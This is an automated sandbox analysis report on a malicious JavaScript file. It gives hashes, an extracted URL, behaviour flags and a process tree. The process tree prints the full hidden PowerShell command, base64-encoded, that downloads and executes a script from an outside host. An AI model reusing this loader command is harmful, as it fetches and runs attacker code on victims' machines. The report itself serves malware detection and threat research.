Analysis
-
max time kernel
118s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08/01/2024, 13:02
Static task
static1
Behavioral task
behavioral1
Sample
4b820c28a160bef91abf97726120bda6.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4b820c28a160bef91abf97726120bda6.js
Resource
win10v2004-20231215-en
General
-
Target
4b820c28a160bef91abf97726120bda6.js
-
Size
80KB
-
MD5
4b820c28a160bef91abf97726120bda6
-
SHA1
e956924ba00a4ea96763bb0d3acd67eeb497f710
-
SHA256
168add12aefe41fe53363c44989dba520a0b0416f7472ed0b0d9b7b44c1a3643
-
SHA512
7bb3da930c1cde4219be7c10e38135bd51b046e4e304949851dd80542362b463c0079aa641de3cfb705ef2915255c2e09c68b942745fc1a389e255490ef8933c
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/ol:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gj
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 476 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 476 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2620 wrote to memory of 2300 2620 wscript.exe 28 PID 2620 wrote to memory of 2300 2620 wscript.exe 28 PID 2620 wrote to memory of 2300 2620 wscript.exe 28 PID 2300 wrote to memory of 476 2300 cmd.exe 30 PID 2300 wrote to memory of 476 2300 cmd.exe 30 PID 2300 wrote to memory of 476 2300 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4b820c28a160bef91abf97726120bda6.js1⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:476
-
-